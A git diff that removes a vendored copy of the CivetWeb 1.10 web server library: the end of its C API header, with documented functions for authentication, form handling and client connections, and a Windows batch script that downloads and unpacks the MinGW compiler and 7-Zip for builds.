- * Parameters:
- *   conn: Current connection handle.
- *   realm: Authentication realm. If NULL is supplied, the sever domain
- *          set in the authentication_domain configuration is used.
- * Return:
- *   < 0   Error
- */
-CIVETWEB_API int
-mg_send_digest_access_authentication_request(struct mg_connection *conn,
-                                             const char *realm);
-
-
-/* Check if the current request has a valid authentication token set.
- * A file is used to provide a list of valid user names, realms and
- * password hashes. The file can be created and modified using the
- * mg_modify_passwords_file API function.
- * Parameters:
- *   conn: Current connection handle.
- *   realm: Authentication realm. If NULL is supplied, the sever domain
- *          set in the authentication_domain configuration is used.
- *   filename: Path and name of a file storing multiple password hashes.
- * Return:
- *   > 0   Valid authentication
- *   0     Invalid authentication
- *   < 0   Error (all values < 0 should be considered as invalid
- *         authentication, future error codes will have negative
- *         numbers)
- *   -1    Parameter error
- *   -2    File not found
- */
-CIVETWEB_API int
-mg_check_digest_access_authentication(struct mg_connection *conn,
-                                      const char *realm,
-                                      const char *filename);
-
-
-/* Send contents of the entire file together with HTTP headers.
- * Parameters:
- *   conn: Current connection handle.
- *   path: Full path to the file to send.
- *   mime_type: Content-Type for file.  NULL will cause the type to be
- *              looked up by the file extension.
- */
-CIVETWEB_API void mg_send_mime_file(struct mg_connection *conn,
-                                    const char *path,
-                                    const char *mime_type);
-
-
-/* Send contents of the entire file together with HTTP headers.
-   Parameters:
-     conn: Current connection information.
-     path: Full path to the file to send.
-     mime_type: Content-Type for file.  NULL will cause the type to be
-                looked up by the file extension.
-     additional_headers: Additional custom header fields appended to the header.
-                         Each header should start with an X-, to ensure it is
-                         not included twice.
-                         NULL does not append anything.
-*/
-CIVETWEB_API void mg_send_mime_file2(struct mg_connection *conn,
-                                     const char *path,
-                                     const char *mime_type,
-                                     const char *additional_headers);
-
-
-/* Store body data into a file. */
-CIVETWEB_API long long mg_store_body(struct mg_connection *conn,
-                                     const char *path);
-/* Read entire request body and store it in a file "path".
-   Return:
-     < 0   Error
-     >= 0  Number of bytes stored in file "path".
-*/
-
-
-/* Read data from the remote end, return number of bytes read.
-   Return:
-     0     connection has been closed by peer. No more data could be read.
-     < 0   read error. No more data could be read from the connection.
-     > 0   number of bytes read into the buffer. */
-CIVETWEB_API int mg_read(struct mg_connection *, void *buf, size_t len);
-
-
-/* Get the value of particular HTTP header.
-
-   This is a helper function. It traverses request_info->http_headers array,
-   and if the header is present in the array, returns its value. If it is
-   not present, NULL is returned. */
-CIVETWEB_API const char *mg_get_header(const struct mg_connection *,
-                                       const char *name);
-
-
-/* Get a value of particular form variable.
-
-   Parameters:
-     data: pointer to form-uri-encoded buffer. This could be either POST data,
-           or request_info.query_string.
-     data_len: length of the encoded data.
-     var_name: variable name to decode from the buffer
-     dst: destination buffer for the decoded variable
-     dst_len: length of the destination buffer
-
-   Return:
-     On success, length of the decoded variable.
-     On error:
-        -1 (variable not found).
-        -2 (destination buffer is NULL, zero length or too small to hold the
-            decoded variable).
-
-   Destination buffer is guaranteed to be '\0' - terminated if it is not
-   NULL or zero length. */
-CIVETWEB_API int mg_get_var(const char *data,
-                            size_t data_len,
-                            const char *var_name,
-                            char *dst,
-                            size_t dst_len);
-
-
-/* Get a value of particular form variable.
-
-   Parameters:
-     data: pointer to form-uri-encoded buffer. This could be either POST data,
-           or request_info.query_string.
-     data_len: length of the encoded data.
-     var_name: variable name to decode from the buffer
-     dst: destination buffer for the decoded variable
-     dst_len: length of the destination buffer
-     occurrence: which occurrence of the variable, 0 is the first, 1 the
-                 second...
-                this makes it possible to parse a query like
-                b=x&a=y&a=z which will have occurrence values b:0, a:0 and a:1
-
-   Return:
-     On success, length of the decoded variable.
-     On error:
-        -1 (variable not found).
-        -2 (destination buffer is NULL, zero length or too small to hold the
-            decoded variable).
-
-   Destination buffer is guaranteed to be '\0' - terminated if it is not
-   NULL or zero length. */
-CIVETWEB_API int mg_get_var2(const char *data,
-                             size_t data_len,
-                             const char *var_name,
-                             char *dst,
-                             size_t dst_len,
-                             size_t occurrence);
-
-
-/* Fetch value of certain cookie variable into the destination buffer.
-
-   Destination buffer is guaranteed to be '\0' - terminated. In case of
-   failure, dst[0] == '\0'. Note that RFC allows many occurrences of the same
-   parameter. This function returns only first occurrence.
-
-   Return:
-     On success, value length.
-     On error:
-        -1 (either "Cookie:" header is not present at all or the requested
-            parameter is not found).
-        -2 (destination buffer is NULL, zero length or too small to hold the
-            value). */
-CIVETWEB_API int mg_get_cookie(const char *cookie,
-                               const char *var_name,
-                               char *buf,
-                               size_t buf_len);
-
-
-/* Download data from the remote web server.
-     host: host name to connect to, e.g. "foo.com", or "10.12.40.1".
-     port: port number, e.g. 80.
-     use_ssl: wether to use SSL connection.
-     error_buffer, error_buffer_size: error message placeholder.
-     request_fmt,...: HTTP request.
-   Return:
-     On success, valid pointer to the new connection, suitable for mg_read().
-     On error, NULL. error_buffer contains error message.
-   Example:
-     char ebuf[100];
-     struct mg_connection *conn;
-     conn = mg_download("google.com", 80, 0, ebuf, sizeof(ebuf),
-                        "%s", "GET / HTTP/1.0\r\nHost: google.com\r\n\r\n");
- */
-CIVETWEB_API struct mg_connection *
-mg_download(const char *host,
-            int port,
-            int use_ssl,
-            char *error_buffer,
-            size_t error_buffer_size,
-            PRINTF_FORMAT_STRING(const char *request_fmt),
-            ...) PRINTF_ARGS(6, 7);
-
-
-/* Close the connection opened by mg_download(). */
-CIVETWEB_API void mg_close_connection(struct mg_connection *conn);
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* File upload functionality. Each uploaded file gets saved into a temporary
-   file and MG_UPLOAD event is sent.
-   Return number of uploaded files.
-   Deprecated: Use mg_handle_form_request instead. */
-CIVETWEB_API int mg_upload(struct mg_connection *conn,
-                           const char *destination_dir);
-#endif
-
-
-/* This structure contains callback functions for handling form fields.
-   It is used as an argument to mg_handle_form_request. */
-struct mg_form_data_handler {
-	/* This callback function is called, if a new field has been found.
-	 * The return value of this callback is used to define how the field
-	 * should be processed.
-	 *
-	 * Parameters:
-	 *   key: Name of the field ("name" property of the HTML input field).
-	 *   filename: Name of a file to upload, at the client computer.
-	 *             Only set for input fields of type "file", otherwise NULL.
-	 *   path: Output parameter: File name (incl. path) to store the file
-	 *         at the server computer. Only used if FORM_FIELD_STORAGE_STORE
-	 *         is returned by this callback. Existing files will be
-	 *         overwritten.
-	 *   pathlen: Length of the buffer for path.
-	 *   user_data: Value of the member user_data of mg_form_data_handler
-	 *
-	 * Return value:
-	 *   The callback must return the intended storage for this field
-	 *   (See FORM_FIELD_STORAGE_*).
-	 */
-	int (*field_found)(const char *key,
-	                   const char *filename,
-	                   char *path,
-	                   size_t pathlen,
-	                   void *user_data);
-
-	/* If the "field_found" callback returned FORM_FIELD_STORAGE_GET,
-	 * this callback will receive the field data.
-	 *
-	 * Parameters:
-	 *   key: Name of the field ("name" property of the HTML input field).
-	 *   value: Value of the input field.
-	 *   user_data: Value of the member user_data of mg_form_data_handler
-	 *
-	 * Return value:
-	 *   TODO: Needs to be defined.
-	 */
-	int (*field_get)(const char *key,
-	                 const char *value,
-	                 size_t valuelen,
-	                 void *user_data);
-
-	/* If the "field_found" callback returned FORM_FIELD_STORAGE_STORE,
-	 * the data will be stored into a file. If the file has been written
-	 * successfully, this callback will be called. This callback will
-	 * not be called for only partially uploaded files. The
-	 * mg_handle_form_request function will either store the file completely
-	 * and call this callback, or it will remove any partial content and
-	 * not call this callback function.
-	 *
-	 * Parameters:
-	 *   path: Path of the file stored at the server.
-	 *   file_size: Size of the stored file in bytes.
-	 *   user_data: Value of the member user_data of mg_form_data_handler
-	 *
-	 * Return value:
-	 *   TODO: Needs to be defined.
-	 */
-	int (*field_store)(const char *path, long long file_size, void *user_data);
-
-	/* User supplied argument, passed to all callback functions. */
-	void *user_data;
-};
-
-
-/* Return values definition for the "field_found" callback in
- * mg_form_data_handler. */
-/* Old nomenclature */
-enum {
-	/* Skip this field (neither get nor store it). Continue with the
-     * next field. */
-	FORM_FIELD_STORAGE_SKIP = 0x0,
-	/* Get the field value. */
-	FORM_FIELD_STORAGE_GET = 0x1,
-	/* Store the field value into a file. */
-	FORM_FIELD_STORAGE_STORE = 0x2,
-	/* Stop parsing this request. Skip the remaining fields. */
-	FORM_FIELD_STORAGE_ABORT = 0x10
-};
-
-/* New nomenclature */
-enum {
-	/* Skip this field (neither get nor store it). Continue with the
-     * next field. */
-	MG_FORM_FIELD_STORAGE_SKIP = 0x0,
-	/* Get the field value. */
-	MG_FORM_FIELD_STORAGE_GET = 0x1,
-	/* Store the field value into a file. */
-	MG_FORM_FIELD_STORAGE_STORE = 0x2,
-	/* Stop parsing this request. Skip the remaining fields. */
-	MG_FORM_FIELD_STORAGE_ABORT = 0x10
-};
-
-/* Process form data.
- * Returns the number of fields handled, or < 0 in case of an error.
- * Note: It is possible that several fields are already handled successfully
- * (e.g., stored into files), before the request handling is stopped with an
- * error. In this case a number < 0 is returned as well.
- * In any case, it is the duty of the caller to remove files once they are
- * no longer required. */
-CIVETWEB_API int mg_handle_form_request(struct mg_connection *conn,
-                                        struct mg_form_data_handler *fdh);
-
-
-/* Convenience function -- create detached thread.
-   Return: 0 on success, non-0 on error. */
-typedef void *(*mg_thread_func_t)(void *);
-CIVETWEB_API int mg_start_thread(mg_thread_func_t f, void *p);
-
-
-/* Return builtin mime type for the given file name.
-   For unrecognized extensions, "text/plain" is returned. */
-CIVETWEB_API const char *mg_get_builtin_mime_type(const char *file_name);
-
-
-/* Get text representation of HTTP status code. */
-CIVETWEB_API const char *
-mg_get_response_code_text(const struct mg_connection *conn, int response_code);
-
-
-/* Return CivetWeb version. */
-CIVETWEB_API const char *mg_version(void);
-
-
-/* URL-decode input buffer into destination buffer.
-   0-terminate the destination buffer.
-   form-url-encoded data differs from URI encoding in a way that it
-   uses '+' as character for space, see RFC 1866 section 8.2.1
-   http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt
-   Return: length of the decoded data, or -1 if dst buffer is too small. */
-CIVETWEB_API int mg_url_decode(const char *src,
-                               int src_len,
-                               char *dst,
-                               int dst_len,
-                               int is_form_url_encoded);
-
-
-/* URL-encode input buffer into destination buffer.
-   returns the length of the resulting buffer or -1
-   is the buffer is too small. */
-CIVETWEB_API int mg_url_encode(const char *src, char *dst, size_t dst_len);
-
-
-/* MD5 hash given strings.
-   Buffer 'buf' must be 33 bytes long. Varargs is a NULL terminated list of
-   ASCIIz strings. When function returns, buf will contain human-readable
-   MD5 hash. Example:
-     char buf[33];
-     mg_md5(buf, "aa", "bb", NULL); */
-CIVETWEB_API char *mg_md5(char buf[33], ...);
-
-
-/* Print error message to the opened error log stream.
-   This utilizes the provided logging configuration.
-     conn: connection (not used for sending data, but to get perameters)
-     fmt: format string without the line return
-     ...: variable argument list
-   Example:
-     mg_cry(conn,"i like %s", "logging"); */
-CIVETWEB_API void mg_cry(const struct mg_connection *conn,
-                         PRINTF_FORMAT_STRING(const char *fmt),
-                         ...) PRINTF_ARGS(2, 3);
-
-
-/* utility methods to compare two buffers, case insensitive. */
-CIVETWEB_API int mg_strcasecmp(const char *s1, const char *s2);
-CIVETWEB_API int mg_strncasecmp(const char *s1, const char *s2, size_t len);
-
-
-/* Connect to a websocket as a client
-   Parameters:
-     host: host to connect to, i.e. "echo.websocket.org" or "192.168.1.1" or
-   "localhost"
-     port: server port
-     use_ssl: make a secure connection to server
-     error_buffer, error_buffer_size: buffer for an error message
-     path: server path you are trying to connect to, i.e. if connection to
-   localhost/app, path should be "/app"
-     origin: value of the Origin HTTP header
-     data_func: callback that should be used when data is received from the
-   server
-     user_data: user supplied argument
-
-   Return:
-     On success, valid mg_connection object.
-     On error, NULL. Se error_buffer for details.
-*/
-CIVETWEB_API struct mg_connection *
-mg_connect_websocket_client(const char *host,
-                            int port,
-                            int use_ssl,
-                            char *error_buffer,
-                            size_t error_buffer_size,
-                            const char *path,
-                            const char *origin,
-                            mg_websocket_data_handler data_func,
-                            mg_websocket_close_handler close_func,
-                            void *user_data);
-
-
-/* Connect to a TCP server as a client (can be used to connect to a HTTP server)
-   Parameters:
-     host: host to connect to, i.e. "www.wikipedia.org" or "192.168.1.1" or
-   "localhost"
-     port: server port
-     use_ssl: make a secure connection to server
-     error_buffer, error_buffer_size: buffer for an error message
-
-   Return:
-     On success, valid mg_connection object.
-     On error, NULL. Se error_buffer for details.
-*/
-CIVETWEB_API struct mg_connection *mg_connect_client(const char *host,
-                                                     int port,
-                                                     int use_ssl,
-                                                     char *error_buffer,
-                                                     size_t error_buffer_size);
-
-
-struct mg_client_options {
-	const char *host;
-	int port;
-	const char *client_cert;
-	const char *server_cert;
-	/* TODO: add more data */
-};
-
-
-CIVETWEB_API struct mg_connection *
-mg_connect_client_secure(const struct mg_client_options *client_options,
-                         char *error_buffer,
-                         size_t error_buffer_size);
-
-
-enum { TIMEOUT_INFINITE = -1 };
-enum { MG_TIMEOUT_INFINITE = -1 };
-
-/* Wait for a response from the server
-   Parameters:
-     conn: connection
-     ebuf, ebuf_len: error message placeholder.
-     timeout: time to wait for a response in milliseconds (if < 0 then wait
-   forever)
-
-   Return:
-     On success, >= 0
-     On error/timeout, < 0
-*/
-CIVETWEB_API int mg_get_response(struct mg_connection *conn,
-                                 char *ebuf,
-                                 size_t ebuf_len,
-                                 int timeout);
-
-
-/* Check which features where set when the civetweb library has been compiled.
-   The function explicitly addresses compile time defines used when building
-   the library - it does not mean, the feature has been initialized using a
-   mg_init_library call.
-   mg_check_feature can be called anytime, even before mg_init_library has
-   been called.
-
-   Parameters:
-     feature: specifies which feature should be checked
-       The value is a bit mask. The individual bits are defined as:
-         1  serve files (NO_FILES not set)
-         2  support HTTPS (NO_SSL not set)
-         4  support CGI (NO_CGI not set)
-         8  support IPv6 (USE_IPV6 set)
-        16  support WebSocket (USE_WEBSOCKET set)
-        32  support Lua scripts and Lua server pages (USE_LUA is set)
-        64  support server side JavaScript (USE_DUKTAPE is set)
-       128  support caching (NO_CACHING not set)
-       256  support server statistics (USE_SERVER_STATS is set)
-       The result is undefined, if bits are set that do not represent a
-       defined feature (currently: feature >= 512).
-       The result is undefined, if no bit is set (feature == 0).
-
-   Return:
-     If feature is available, the corresponding bit is set
-     If feature is not available, the bit is 0
-*/
-CIVETWEB_API unsigned mg_check_feature(unsigned feature);
-
-
-/* Get information on the system. Useful for support requests.
-   Parameters:
-     buffer: Store system information as string here.
-     buflen: Length of buffer (including a byte required for a terminating 0).
-   Return:
-     Available size of system information, exluding a terminating 0.
-     The information is complete, if the return value is smaller than buflen.
-     The result is a JSON formatted string, the exact content may vary.
-   Note:
-     It is possible to determine the required buflen, by first calling this
-     function with buffer = NULL and buflen = NULL. The required buflen is
-     one byte more than the returned value.
-*/
-CIVETWEB_API int mg_get_system_info(char *buffer, int buflen);
-
-
-/* Get context information. Useful for server diagnosis.
-   Parameters:
-     ctx: Context handle
-     buffer: Store context information here.
-     buflen: Length of buffer (including a byte required for a terminating 0).
-   Return:
-     Available size of system information, exluding a terminating 0.
-     The information is complete, if the return value is smaller than buflen.
-     The result is a JSON formatted string, the exact content may vary.
-     Note:
-     It is possible to determine the required buflen, by first calling this
-     function with buffer = NULL and buflen = NULL. The required buflen is
-     one byte more than the returned value. However, since the available
-     context information changes, you should allocate a few bytes more.
-*/
-CIVETWEB_API int
-mg_get_context_info(const struct mg_context *ctx, char *buffer, int buflen);
-
-
-#ifdef MG_EXPERIMENTAL_INTERFACES
-/* Get connection information. Useful for server diagnosis.
-   Parameters:
-     ctx: Context handle
-     idx: Connection index
-     buffer: Store context information here.
-     buflen: Length of buffer (including a byte required for a terminating 0).
-   Return:
-     Available size of system information, exluding a terminating 0.
-     The information is complete, if the return value is smaller than buflen.
-     The result is a JSON formatted string, the exact content may vary.
-   Note:
-     It is possible to determine the required buflen, by first calling this
-     function with buffer = NULL and buflen = NULL. The required buflen is
-     one byte more than the returned value. However, since the available
-     context information changes, you should allocate a few bytes more.
-*/
-CIVETWEB_API int mg_get_connection_info(const struct mg_context *ctx,
-                                        int idx,
-                                        char *buffer,
-                                        int buflen);
-#endif
-
-
-#ifdef __cplusplus
-}
-#endif /* __cplusplus */
-
-#endif /* CIVETWEB_HEADER_INCLUDED */
diff --git a/thirdparty/civetweb-1.10/mingw.cmd b/thirdparty/civetweb-1.10/mingw.cmd
deleted file mode 100644
index 4b26215..0000000
--- a/thirdparty/civetweb-1.10/mingw.cmd
+++ /dev/null
@@ -1,884 +0,0 @@
-:: Make sure the extensions are enabled
-@verify other 2>nul
-@setlocal EnableExtensions EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :print_usage "Failed to enable extensions"
-  @exit /b 1
-)
-
-::Change the code page to unicode
-@chcp 65001 1>nul 2>nul
-@if errorlevel 1 (
-  @call :print_usage "Failed to change the code page to unicode"
-  @exit /b 1
-)
-
-:: Set up some global variables
-@set "script_name=%~nx0"
-@set "script_folder=%~dp0"
-@set "script_folder=%script_folder:~0,-1%"
-@set "dependency_path=%TEMP%\mingw-build-dependencies"
-
-:: Check the command line parameters
-@set logging_level=1
-:options_loop
-@if [%1] == [] goto :options_parsed
-@set "arg=%~1"
-@set one=%arg:~0,1%
-@set two=%arg:~0,2%
-@set three=%arg:~0,3%
-@if /i [%arg%] == [/?] (
-  @call :print_usage "Downloads a specific version of MinGW"
-  @exit /b 0
-)
-@if /i [%arg%] == [/q] set quiet=true
-@if /i [%two%] == [/v] @if /i not [%three%] == [/ve] @call :verbosity "!arg!"
-@if /i [%arg%] == [/version] set "version=%~2" & shift
-@if /i [%arg%] == [/arch] set "arch=%~2" & shift
-@if /i [%arg%] == [/exceptions] set "exceptions=%~2" & shift
-@if /i [%arg%] == [/threading] set "threading=%~2" & shift
-@if /i [%arg%] == [/revision] set "revision=%~2" & shift
-@if /i not [!one!] == [/] (
-  if not defined output_path (
-    set output_path=!arg!
-  ) else (
-    @call :print_usage "Too many output locations: !output_path! !arg!" ^
-                       "There should only be one output location"
-    @exit /b 1
-  )
-)
-@shift
-@goto :options_loop
-:options_parsed
-@if defined quiet set logging_level=0
-@if not defined output_path set "output_path=%script_folder%\mingw-builds"
-@set "output_path=%output_path:/=\%"
-
-:: Set up the logging
-@set "log_folder=%output_path%\logs"
-@call :iso8601 timestamp
-@set "log_path=%log_folder%\%timestamp%.log"
-@set log_keep=10
-
-:: Get default architecture
-@if not defined arch @call :architecture arch
-
-:: Only keep a certain amount of logs
-@set /a "log_keep=log_keep-1"
-@if not exist %log_folder% @mkdir %log_folder%
-@for /f "skip=%log_keep%" %%f in ('dir /b /o-D /tc %log_folder%') do @(
-  @call :log 4 "Removing old log file %log_folder%\%%f"
-  del %log_folder%\%%f
-)
-
-:: Set up some more global variables
-@call :windows_version win_ver win_ver_major win_ver_minor win_ver_rev
-@call :script_source script_source
-@if [%script_source%] == [explorer] (
-  set /a "logging_level=logging_level+1"
-)
-
-:: Execute the main function
-@call :main "%arch%" "%version%" "%threading%" "%exceptions%" "%revision%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to download MinGW"
-  @call :log 0 "View the log at %log_path%"
-  @exit /b 1
-)
-
-:: Stop the script if the user double clicked
-@if [%script_source%] == [explorer] (
-  pause
-)
-
-@endlocal
-@goto :eof
-
-:: -------------------------- Functions start here ----------------------------
-
-:main - Main function that performs the download
-:: %1 - Target architecture
-:: %2 - Version of MinGW to get [optional]
-:: %3 - Threading model [optional]
-:: %4 - Exception model [optional]
-:: %5 - Package revision [optional]
-@setlocal
-@call :log 6
-@call :log 2 "Welcome to the MinGW download script"
-@call :log 6 "------------------------------------"
-@call :log 6
-@call :log 2 "This script downloads a specific version of MinGW"
-@set "arch=%~1"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~2"
-@set "threading=%~3"
-@set "exceptions=%~4"
-@set "revision=%~5"
-@call :log 3 "arch       = %arch%"
-@call :log 3 "version    = %version%"
-@call :log 3 "exceptions = %exceptions%"
-@call :log 3 "threading  = %threading%"
-@call :log 3 "revision   = %revision%"
-@call :repository repo
-@if errorlevel 1 (
-  @call :log 0 "Failed to get the MinGW-builds repository information"
-  @exit /b 1
-)
-@call :resolve slug url "%repo%" "%arch%" "%version%" "%threading%" "%exceptions%" "%revision%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to resolve the correct URL of MinGW"
-  @exit /b 1
-)
-@call :unpack compiler_path "%url%" "%output_path%\mingw\%slug%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to unpack the MinGW archive"
-  @exit /b 1
-)
-@rmdir /s /q "%dependency_path%"
-@echo.%compiler_path%
-@endlocal
-@goto :eof
-
-:repository - Gets the MinGW-builds repository
-:: %1 - The return variable for the repository file path
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@call :log 7
-@call :log 2 "Getting MinGW repository information"
-@set "url=http://downloads.sourceforge.net/project/mingw-w64/Toolchains targetting Win32/Personal Builds/mingw-builds/installer/repository.txt"
-@call :log 6
-@call :log 1 "Downloading MinGW repository"
-@set "file_path=%dependency_path%\mingw-repository.txt"
-@call :download "%url%" "%file_path%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to download the MinGW repository information"
-  @exit /b 1
-)
-@set "repository_path=%dependency_path%\repository.txt"
-@del "%repository_path%" 2>nul
-@for /f "delims=| tokens=1-6,*" %%a in (%file_path%) do @(
-  @set "version=%%~a"
-  @set "version=!version: =!"
-  @set "arch=%%~b"
-  @set "arch=!arch: =!"
-  @set "threading=%%~c"
-  @set "threading=!threading: =!"
-  @set "exceptions=%%~d"
-  @set "exceptions=!exceptions: =!"
-  @set "revision=%%~e"
-  @set "revision=!revision: =!"
-  @set "revision=!revision:rev=!"
-  @set "url=%%~f"
-  @set "url=!url:%%20= !"
-  @for /l %%a in (1,1,32) do @if "!url:~-1!" == " " set url=!url:~0,-1!
-  @echo !arch!^|!version!^|!threading!^|!exceptions!^|!revision!^|!url!>> "%repository_path%"
-)
-@del "%file_path%" 2>nul
-@endlocal & set "%var%=%repository_path%"
-@goto :eof
-
-:resolve - Gets the MinGW-builds repository
-:: %1 - The return variable for the MinGW slug
-:: %2 - The return variable for the MinGW URL
-:: %3 - The repository information to use
-:: %4 - Target architecture
-:: %5 - Version of MinGW to get [optional]
-:: %6 - Threading model [optional]
-:: %7 - Exception model [optional]
-:: %8 - Package revision [optional]
-@setlocal
-@set "slug_var=%~1"
-@if "%slug_var%" == "" @exit /b 1
-@set "url_var=%~2"
-@if "%url_var%" == "" @exit /b 1
-@set "repository=%~3"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~4"
-@if "%arch%" == "" @exit /b 1
-@call :resolve_version version "%repository%" "%arch%" "%~5"
-@if errorlevel 1 @exit /b 1
-@call :resolve_threading threading "%repository%" "%arch%" "%version%" "%~6"
-@if errorlevel 1 @exit /b 1
-@call :resolve_exceptions exceptions "%repository%" "%arch%" "%version%" "%threading%" "%~7"
-@if errorlevel 1 @exit /b 1
-@call :resolve_revision revision "%repository%" "%arch%" "%version%" "%threading%" "%exceptions%" "%~8"
-@if errorlevel 1 @exit /b 1
-@call :log 3 "Finding URL"
-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @if "%version%" == "%%b" (
-      @if "%threading%" == "%%c" (
-        @if "%exceptions%" == "%%d" (
-          @if "%revision%" == "%%e" (
-            @set "url=%%f"
-) ) ) ) ) )
-@if "%url%" == "" (
-  @call :log 0 "Failed to resolve URL"
-  @exit /b 1
-)
-@set slug=gcc-%version%-%arch%-%threading%-%exceptions%-rev%revision%
-@call :log 2 "Resolved slug: %slug%"
-@call :log 2 "Resolved url: %url%"
-@endlocal & set "%slug_var%=%slug%" & set "%url_var%=%url%"
-@goto :eof
-
-:unpack - Unpacks the MinGW archive
-:: %1 - The return variable name for the compiler path
-:: %2 - The filepath or URL of the archive
-:: %3 - The folder to unpack to
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "archive_path=%~2"
-@if "%archive_path%" == "" @exit /b 1
-@set "folder_path=%~3"
-@if "%folder_path%" == "" @exit /b 1
-@set "compiler_path=%folder_path%\bin"
-@if exist "%compiler_path%" goto :unpack_done
-@call :log 7
-@call :log 2 "Unpacking MinGW archive"
-@set "http=%archive_path:~0,4%"
-@if "%http%" == "http" (
-  @set "url=%archive_path%"
-  @for /f %%a in ("!url: =-!") do @set "file_name=%%~na"
-  @for /f %%a in ("!url: =-!") do @set "file_ext=%%~xa"
-  @set "archive_path=%dependency_path%\!file_name!!file_ext!"
-  @if not exist "!archive_path!" (
-    @call :log 6
-    @call :log 1 "Downloading MinGW archive"
-    @call :download "!url!" "!archive_path!"
-    @if errorlevel 1 (
-      @del "!archive_path!" 2>nul
-      @call :log 0 "Failed to download: !file_name!!file_ext!"
-      @exit /b 1
-    )
-  )
-)
-@if not exist "%archive_path%" (
-  @call :log 0 "The archive did not exist to unpack: %archive_path%"
-  @exit /b 1
-)
-@for /f %%a in ("%archive_path: =-%") do @set "file_name=%%~na"
-@for /f %%a in ("%archive_path: =-%") do @set "file_ext=%%~xa"
-@call :log 6
-@call :log 1 "Unpacking MinGW %file_name%%file_ext%"
-@call :find_sevenzip sevenzip_executable
-@if errorlevel 1 (
-  @call :log 0 "Need 7zip to unpack the MinGW archive"
-  @exit /b 1
-)
-@call :iso8601 iso8601
-@for /f %%a in ("%folder_path%") do @set "tmp_path=%%~dpatmp-%iso8601%"
-@"%sevenzip_executable%" x -y "-o%tmp_path%" "%archive_path%" > nul
-@if errorlevel 1 (
-  @rmdir /s /q "%folder_path%"
-  @call :log 0 "Failed to unpack the MinGW archive"
-  @exit /b 1
-)
-@set "expected_path=%tmp_path%\mingw64"
-@if not exist "%expected_path%" (
-  @set "expected_path=%tmp_path%\mingw32"
-)
-@move /y "%expected_path%" "%folder_path%" > nul
-@if errorlevel 1 (
-  @rmdir /s /q "%tmp_path%" 2>nul
-  @call :log 0 "Failed to move MinGW folder"
-  @call :log 0 "%expected_path%"
-  @call :log 0 "%folder_path%"
-  @exit /b 1
-)
-@rmdir /s /q %tmp_path%
-@set "compiler_path=%folder_path%\bin"
-:unpack_done
-@if not exist "%compiler_path%\gcc.exe" (
-  @call :log 0 "Failed to find gcc: %compiler_path%"
-  @exit /b 1
-)
-@endlocal & set "%var%=%compiler_path%"
-@goto :eof
-
-:find_sevenzip - Finds (or downloads) the 7zip executable
-:: %1 - The return variable for the 7zip executable path
-@setlocal
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@call :log 2 "Finding 7zip"
-@call :find_in_path sevenzip_executable 7z.exe
-@if not errorlevel 1 goto :find_sevenzip_done
-@call :find_in_path sevenzip_executable 7za.exe
-@if not errorlevel 1 goto :find_sevenzip_done
-@set checksum=2FAC454A90AE96021F4FFC607D4C00F8
-@set "url=http://7-zip.org/a/7za920.zip"
-@for /f %%a in ("%url: =-%") do @set "file_name=%%~na"
-@for /f %%a in ("%url: =-%") do @set "file_ext=%%~xa"
-@set "archive_path=%dependency_path%\%file_name%%file_ext%"
-@if not exist "%archive_path%" (
-  @call :log 6
-  @call :log 1 "Downloading 7zip archive"
-  @call :download "%url%" "%archive_path%" %checksum%
-  @if errorlevel 1 (
-    @del "%archive_path%" 2>nul
-    @call :log 0 "Failed to download: %file_name%%file_ext%"
-    @exit /b 1
-  )
-)
-@set "sevenzip_path=%dependency_path%\sevenzip"
-@if not exist "%sevenzip_path%" (
-  @call :unzip "%archive_path%" "%sevenzip_path%"
-  @if errorlevel 1 (
-    @call :log 0 "Failed to unzip the7zip archive"
-    @exit /b 1
-  )
-)
-@set "sevenzip_executable=%sevenzip_path%\7za.exe"
-@if not exist "%sevenzip_executable%" (
-  @call :log 0 "Failed to find unpacked 7zip: %sevenzip_executable%"
-  @exit /b 1
-)
-:find_sevenzip_done
-@call :log 2 "Found 7zip: %sevenzip_executable%"
-@endlocal & set "%var%=%sevenzip_executable%"
-@goto :eof
-
-:unzip - Unzips a .zip archive
-:: %1 - The archive to unzip
-:: %2 - The location to unzip to
-@setlocal
-@set "archive_path=%~1"
-@if "%archive_path%" == "" @exit /b 1
-@set "folder_path=%~2"
-@if "%folder_path%" == "" @exit /b 1
-@for /f %%a in ("%archive_path: =-%") do @set "file_name=%%~na"
-@for /f %%a in ("%archive_path: =-%") do @set "file_ext=%%~xa"
-@call :log 2 "Unzipping: %file_name%%file_ext%"
-@call :iso8601 iso8601
-@set "log_path=%temp%\unzip-%iso8601%-%file_name%.log"
-@powershell ^
-  Add-Type -assembly "system.io.compression.filesystem"; ^
-  [io.compression.zipfile]::ExtractToDirectory(^
-    '%archive_path%', '%folder_path%') 2>"%log_path%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to unzip: %file_name%%file_ext%"
-  @call :log_append "%log_path%"
-  @exit /b 1
-)
-@endlocal
-@goto :eof
-
-:resolve_version - Gets the version of the MinGW compiler
-:: %1 - The return variable for the version
-:: %2 - The repository information to use
-:: %3 - The architecture of the compiler
-:: %4 - Version of MinGW to get [optional]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "repository=%~2"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~3"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~4"
-@if not "%version%" == "" goto :resolve_version_done
-:: Find the latest version
-@call :log 3 "Finding latest version"
-@set version=0.0.0
